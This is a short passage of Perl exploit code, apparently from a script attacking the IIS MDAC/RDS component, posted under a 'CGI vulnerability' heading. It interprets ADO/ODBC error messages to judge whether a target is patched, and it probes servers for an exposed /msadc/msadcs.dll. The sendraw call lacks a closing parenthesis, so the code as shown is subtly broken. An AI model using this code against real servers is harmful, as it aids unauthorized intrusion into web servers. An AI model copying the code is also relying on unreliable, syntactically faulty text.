CGI漏洞(41) my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;}}
sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"; my $base=content_start(@results); return 1 if($results[$base]=~/Content-Type: application\/x-varg/); return 0;}